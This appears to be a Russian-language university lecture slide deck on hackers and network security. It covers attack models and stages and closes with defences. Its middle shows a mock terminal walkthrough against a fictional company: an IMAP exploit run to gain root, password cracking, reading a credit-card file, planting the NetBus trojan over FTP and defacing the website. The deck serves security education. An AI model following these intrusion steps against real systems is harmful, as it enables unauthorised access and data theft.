ПЕТУХ ПРОСЫПАЕТСЯ РАНО, А ЗЛОДЕЙ ЕЩЕ РАНЬШЕ….. (немного о хакерах и сетевой безопасности) Пестунова Тамара Михайловна кандидат технических наук, доцент

Цели злоумышленников Вызов обществу, самоудовлетворение, месть Политическая выгода Финансовая выгода Разрушение

От чего надо защищаться? Отказ в обслуживании «Слабые» пароли MS Internet Information Server Атаки на базы данных (Oracle и MS SQL) Атаки на приложения eCommerce Атаки на электронную почту Атаки на разделяемые ресурсы (NetBIOS и NFS) Атаки на RPC (удаленный вызов процедур) «Переполнение буфера» Источник: ISS Connect 2000

Уязвимости Любая характеристика или свойство информационной системы, использование которой нарушителем может привести к реализации угрозы. ошибки в программах; человеческие ошибки и неправильная конфигурация разрешенный, но неиспользуемый сервис восприимчивость к атакам типа «отказ в обслуживании» ошибки при проектировании

Уровни информационной системы ПРИЛОЖЕНИЯ БД ОС СЕТЕВЫЕ УСЛУГИ

Атаки Атака - любое действие или связанная последовательность действий нарушителя, которые приводят к реализации угрозы путем использования уязвимостей информационной системы.

Модель традиционной атаки Атакующий Цель атаки Отношение «один к одному»

Модель традиционной атаки Атакующий Цель атаки Отношение «один ко многим»

Модель традиционной атаки Атакующий Цель атаки Промежуточный узел 1 Промежуточный узел 2

Модель распределенной атаки Атакующий Цель атаки Отношение «многие к одному»

Модель распределенной атаки Цель атаки Отношение «многие ко многим» Атакующий

Этапы осуществления атаки Сбор информации Реализация атаки Завершение атаки изучение окружения топология сети идентификация узлов сканирование портов идентификация ОС идентификация роли узла идентификация уязвимостей проникновение установление контроля чистка логов

Анатомия атаки

bigwidget.com

Record last updated on 29-Jun-98. Record created on 30-Jun-94. Database last updated on 13-Oct-98 06:21:01 EDT. Domain servers in listed order: EHECATL. BIGWIDGET NS1.SPRINTLINK.NET NS.COMMANDCORP.COM Registrant: BigWidget, Conglomerated. (BWC2-DOM) 1234 Main Street Anytown, GA USA Domain Name: bigwidget.com Administrative Contact, Technical Contact, Zone Contact: BigWidget Admin (IA338-ORG) Phone Fax Billing Contact: BigWidget Billing (IB158-ORG) Phone Fax BIGWIDGET.COM

~$ telnet bigwidget.com 25 Trying Connected to bigwidget.com Escape character is '^]'. hacker: hacker:~$ Connection closed by foreign host. telnet bigwidget.com 143 Trying Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct :51: (EDT) (Report problems in this server to logout * BYE bigwidget IMAP4rev1 server terminating connection. OK LOGOUT completed Connection closed by foreign host.

imap

imap

hacker ~$./imap_exploit bigwidget.com IMAP Exploit for Linux. Author: Akylonius Modifications: p1 Completed successfully. hacker ~$ telnet bigwidget.com Trying Connected to bigwidget.com. Red Hat Linux release 4.2 (Biltmore) Kernel on an i686 root bigwidget:~# whoami root bigwidget:~# cat./hosts localhost localhost.localdomain thevault accounting fasttalk sales geekspeak engineering people human resources thelinks marketing thesource information systems bigwidget:~# cd /etc rlogin thevault login:

Allan B. Smith /99 Donna D. Smith /98 Jim Smith /01 Joseph L.Smith /02 Kay L. Smith /03 Mary Ann Smith /01 Robert F. Smith /99 thevault:~# cat visa.txt cd /data/creditcards crack /etc/passwd Cracking /etc/passwd... username: bobman password: nambob username: mary password: mary username: root password: ncc1701 thevault:~# ftp thesource Connected to thesource 220 thesource Microsoft FTP Service (Version 4.0). Name: administrator 331 Password required for administrator. Password: ******* 230 User administrator logged in. Remote system type is Windows_NT.

ftp> cd \temp 250 CDW command successful. ftp> send netbus.exe local: netbus.exe remote: netbus.exe 200 PORT command successful. 150 Opening BINARY mode data connection for netbus.exe 226 Transfer complete. ftp> quit thevault:~$ telnet thesource Trying Connected to thesource.bigwidget.com. Escape character is '^]'. Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381) Welcome to MS Telnet Service Telnet Server Build login: administrator password: ******* *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\> cd \temp C:\TEMP> netbus.exe

Connected to the.source.bigwidget.com NetBus 1.6, by cf Screendump David Smith My Raise Dear Mr. Smith I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350, a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it. Your Son, Dave David Smith

Сеть компании BigWidget UNIX Firewall сервер Web сервер Router NT Рабочие станции сеть UNIX NTUNIX imap Crack NetBus Пример осуществления атаки

c:\> ftp webcentral Connected to webcentral 220 webcentral Microsoft FTP Service (Version 4.0). Name: jsmith 331 Password required for jsmith. Password: ******* 230 User jsmith logged in. Remote system type is Windows_NT. ftp> send index.html local: bigwedgie.html remote: index.html 200 PORT command successful. 150 Opening BINARY mode data connection for index.html 226 Transfer complete. ftp> quit 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 10 -rwxr-xr-x 9 jsmith jsmith 1024 Aug 17 17:07. -rwxr-xr-x 9 root root 1024 Aug 17 17:07.. -rwxr-xr-x 2 jsmith jsmith 2034 Aug 17 17:07 index.html -rwxr-xr-x 2 jsmith jsmith 1244 Aug 17 17:07 image1.gif -rwxr-xr-x 2 jsmith jsmith Aug 17 17:07 image2.gif -rwxr-x--x 6 jsmith jsmith 877 Aug 17 17:07 title.gif -rwxr-xr-x 2 jsmith jsmith 1314 Aug 17 17:07 bigwidget.jpg -rwxr-xr-x 2 jsmith jsmith 1824 Aug 17 17:07 page2.html 226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec) ftp> dir

UNIX Firewall сервер Web сервер Router NT Рабочие станции Сеть UNIX NTUNIX Сеть компании BigWidget Пример осуществления атаки

Традиционные средства защиты

Компоненты системы безопасности ИНФРАСТРУКТУРА БЕЗОПАСНОСТИ Access Control Authentication Encryption Virus/Content Security

Инфраструктура безопасности ИНФРАСТРУКТУРА БЕЗОПАСНОСТИ Access Control Authentication Encryption Virus/Content Security Access Control Контроль доступа Routers Firewalls

Инфраструктура безопасности ИНФРАСТРУКТУРА БЕЗОПАСНОСТИ Access Control Authentication Encryption Virus/Content Security ID Аутентификация ID Johnsmith ************ Admin

Инфраструктура безопасности ИНФРАСТРУКТУРА БЕЗОПАСНОСТИ Access Control Authentication Encryption Virus/Content Security Шифрование PKI SSL 85urtiowjeuqp i9476ljbmvnxkdkbmg 85urtiowjeuqp i9476ljbmvnx 8573urtiowjeuqp082 memo